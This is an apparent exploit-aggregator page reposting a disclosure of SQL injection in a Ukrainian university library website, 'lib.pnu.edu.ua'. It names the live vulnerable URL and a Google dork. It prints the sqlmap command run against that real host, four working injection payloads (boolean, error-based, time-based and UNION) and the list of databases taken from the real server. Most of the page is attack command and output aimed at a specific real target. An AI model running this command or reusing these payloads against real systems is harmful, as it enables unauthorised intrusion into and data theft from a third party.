Advertisement






VASYL STEFANYK UNIVERSITY | SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-18
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040103

Below is a copy:

VASYL STEFANYK UNIVERSITY | SQL Injection Vulnerability
# Exploit Title: VASYL STEFANYK UNIVERSITY | SQL Injection Vulnerability
# Author: Emyounoone
# Date: 17/04/2021
# Tested On: Kali Linux
# Contact: https://instagram.com/emyounoone
# Google Dork: read.php?id=

----------------------------------------------------------------------------------------------------

# Vulnerable Path: http://lib.pnu.edu.ua/read.php?id=1

# python3 sqlmap.py http://lib.pnu.edu.ua/read.php?id=1 --dbs --random-agent

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7097=7097) THEN 1 ELSE (SELECT 4010 UNION SELECT 4511) END))

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 OR (SELECT 4232 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(4232=4232,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: id=1 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 24 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707171,0x59474b73796f7a6d4b66707a765662487349776548564c43526f6868596b446a4f587847704a7173,0x71706a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
available databases [7]:
[*] c3lib
[*] information_schema
[*] my
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.